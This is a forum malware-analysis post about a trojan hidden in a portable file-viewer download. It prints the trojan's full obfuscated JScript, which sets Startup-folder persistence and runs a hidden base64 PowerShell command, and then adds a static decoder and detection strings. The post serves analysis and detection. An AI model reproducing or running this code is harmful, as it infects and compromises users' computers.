
[Share] [PC Sample Analysis] Newcomer's analysis

z3960 

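FileViewPro universal viewer, portable ("green") edition
https://www.52pojie.cn/thread-1059431-1-1.html
(Source: 52pojie forum)

Sample link: https://wwi.lanzouw.com/im1KLya83mh Password: 52pj

@三木森啊 The software uploaded by this user is bundled with a trojan virus; it was detected by 360.

Online scan: https://www.virustotal.com/gui/file/a8bb13a0dcec03fb452a53e985285b74c511eb7daacb9daa22dbb647705fba9b

Next, begin unpacking.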

[JavaScript]
// Helper: instantiate a COM object from its ProgID.
ERUJHTSETJSEJSEA = function(ObjN) {
  ResName = new ActiveXObject(ObjN);
  return ResName;
};
WScript.Sleep(5005);

// Helper: reverse a string. Every string literal below is stored reversed.
function ASDGHKFIASYLWGHAfi(str) {
  splitString = str.split("");
  reverseArray = splitString.reverse();
  joinArray = reverseArray.join("");
  return joinArray;
};

aq = ASDGHKFIASYLWGHAfi("sj.muimorhC\atadppa\");  // reversed: \appdata\Chromium.js
WScript.Sleep(2002);
SETYa = ASDGHKFIASYLWGHAfi("tAFIFcejAFIFbOmetAFIFsySelAFIFiF.gAFIFniAFIFtpirAFIFcS");
SETYaa = SETYa.replace(/FIFA/g, '');  // "Scripting.FileSystemObject"
fso = WScript.CreateObject(SETYaa);
zr = fso.FileExists(aq);
if (zr == false) {
  WScript.Sleep(2002);
  SETYs = ASDGHKFIASYLWGHAfi("llAFIFeAFIFhS.tpiAFIFrcAFIFSW");
  SETYss = SETYs.replace(/FIFA/g, '');  // "WScript.Shell"
  wscr = new ERUJHTSETJSEJSEA(SETYss);
  // Persistence, step 1: copy this script to %USERPROFILE% + aq.
  fso.CopyFile(WScript.ScriptFullName, wscr.ExpandEnvironmentStrings(ASDGHKFIASYLWGHAfi("%ELIFORPRESU%")) + aq, true);
  WScript.Sleep(8008);
  // Persistence, step 2: create Chromium.ini.lnk in the Startup folder, pointing at the copy.
  link = wscr.SpecialFolders(ASDGHKFIASYLWGHAfi("putratS")) + ASDGHKFIASYLWGHAfi("\") + ASDGHKFIASYLWGHAfi("knl.ini.muimorhC");
  shortcut = wscr.CreateShortcut(link);
  shortcut.TargetPath = ASDGHKFIASYLWGHAfi("%ELIFORPRESU%") + aq;
  shortcut.Arguments = ASDGHKFIASYLWGHAfi(ASDGHKFIASYLWGHAfi(""));
  WScript.Sleep(1000);
  shortcut.Description = ASDGHKFIASYLWGHAfi("ini.muimorhC");
  shortcut.IconLocation = ASDGHKFIASYLWGHAfi("96,lld.23LLEHS\23metsys\%tooRmetsyS%");
  shortcut.WindowStyle = 4;
  shortcut.Save();
}
WScript.Sleep(8008);
try {
  // setTimeout does not exist under Windows Script Host, so this throws and the catch block runs.
  setTimeout(ASDGHKFIASYLWGHAfi(ASDGHKFIASYLWGHAfi("")), 888);
} catch(f) {
  SETYy = ASDGHKFIASYLWGHAfi("eAFIFxAFIFeAFIF.lAFIFleAFIFhsAFIFrewAFIFoPAFIF");
  SETYyy = SETYy.replace(/FIFA/g, '');  // "Powershell.exe"
  C = SETYyy;
  BB = ASDGHKFIASYLWGHAfi(" e- tixeon- ");  // " -noexit -e "
  // SD, SV, SF: reversed chunks of the base64 command handed to PowerShell via -e.
  SD = ASDGHKFIASYLWGHAfi("wGADBgYAUGAXBgLAQHAlBgTAcCAgAAdAMGAlBgaAIGAPBQLAcHAlBgTAgCAoAwZA4GApBgcAQHATBANAYDAlBwcAEGAiBQbA8GAyBgRAoDA6AQXAQHAyBQZAYHAuBwbAMEAbBAKAQGAhBwbAwEAuAgbAkGAhBQbA8GAEBAdA4GAlBgcAIHA1BwQAoDA6AQXA4GApBQYA0GAvBARAAHAwBQQAsFAgAwOAgDAgAAcAUGAlBAbAMHAgAAI");
  SV = ASDGHKFIASYLWGHAfi("GAwBQZAIHAuAQKAcCAzAAcA0GAuAgYA8CA0BQaAIGAvAQZAMGAhBAcAMHAuAgaAMHAzBQaAMHAvAwLAoDAwBAdAQHAoBwJAgCAnAwZA4GApBgcAQHATBAZAEGAvBAbA4GA3BwbAQEAnAgLAkCAnAAdA4GAlBQaA");
  SF = ASDGHKFIASYLWGHAfi("AkCAsBAbAUHAuBAJAwCAsBAbAUHAuBAJAgCAlBwaA8GA2BgbAkGAuAAdA4GApBwbAAFA5BgcAQHAuBQRA4CApAQKAkCAnAQQAcCAsAwJA4HAhAgKA4FAnAAKAUGAjBQYAw");
  wscr.Run(C+BB+SD+SV+SF, 0, false);
};

The trojan file is ID.js.
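
The readable strings in the script above can be recovered statically, without running the sample. The following Node.js decoder is an added example and not part of the original post; the function names, the excerpt and the harmless stand-in chunks are assumptions constructed for this illustration.

```javascript
// Added example: static decoding of the string obfuscation in the ID.js sample.
// Nothing from the sample is executed; literals are only handled as text.
const JUNK = /FIFA/g; // junk token the sample removes with .replace(/FIFA/g, '')

// Same transform as the sample's ASDGHKFIASYLWGHAfi(): reverse the characters.
const rev = (s) => s.split("").reverse().join("");

// Reverse, then strip the junk token (the SETYa -> SETYaa step in the sample).
const decodeLiteral = (s) => rev(s).replace(JUNK, "");

// Collect and decode every literal wrapped in the reverse helper in a script's text.
function extractLiterals(source, helper = "ASDGHKFIASYLWGHAfi") {
  const re = new RegExp(helper + '\\("([^"]*)"\\)', "g");
  return [...source.matchAll(re)].map((m) => decodeLiteral(m[1]));
}

// PowerShell's -e switch takes base64 of UTF-16LE text. The sample stores that
// base64 as chunks (SD, SV, SF), each reversed on its own, then concatenates.
function decodeEncodedCommand(chunks) {
  return Buffer.from(chunks.map(rev).join(""), "base64").toString("utf16le");
}

// Excerpt built from short literals in the post (constructed; not the full script).
const EXCERPT = `
SETYa = ASDGHKFIASYLWGHAfi("tAFIFcejAFIFbOmetAFIFsySelAFIFiF.gAFIFniAFIFtpirAFIFcS");
SETYs = ASDGHKFIASYLWGHAfi("llAFIFeAFIFhS.tpiAFIFrcAFIFSW");
link = wscr.SpecialFolders(ASDGHKFIASYLWGHAfi("putratS")) + ASDGHKFIASYLWGHAfi("knl.ini.muimorhC");
SETYy = ASDGHKFIASYLWGHAfi("eAFIFxAFIFeAFIF.lAFIFleAFIFhsAFIFrewAFIFoPAFIF");
BB = ASDGHKFIASYLWGHAfi(" e- tixeon- ");
`;

// Constructed, harmless stand-in for the SD/SV/SF chunks (not the sample's payload).
function constructedChunks(text = "Write-Output 'constructed sample'") {
  const b64 = Buffer.from(text, "utf16le").toString("base64");
  return [b64.slice(0, 12), b64.slice(12, 40), b64.slice(40)].map(rev);
}

console.log(extractLiterals(EXCERPT));
console.log(decodeEncodedCommand(constructedChunks()));
```

Decoded ProgIDs such as `Scripting.FileSystemObject` and `WScript.Shell`, a `.lnk` in the Startup folder, and `Powershell.exe` launched with ` -noexit -e ` are the strings worth matching on when hunting for this pattern.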
Level: Super Moderator

Reply 1, posted: 2022-01-09
Taking a look.
Level: Super Moderator

Reply 2, posted: 2022-01-09
Nice, got it.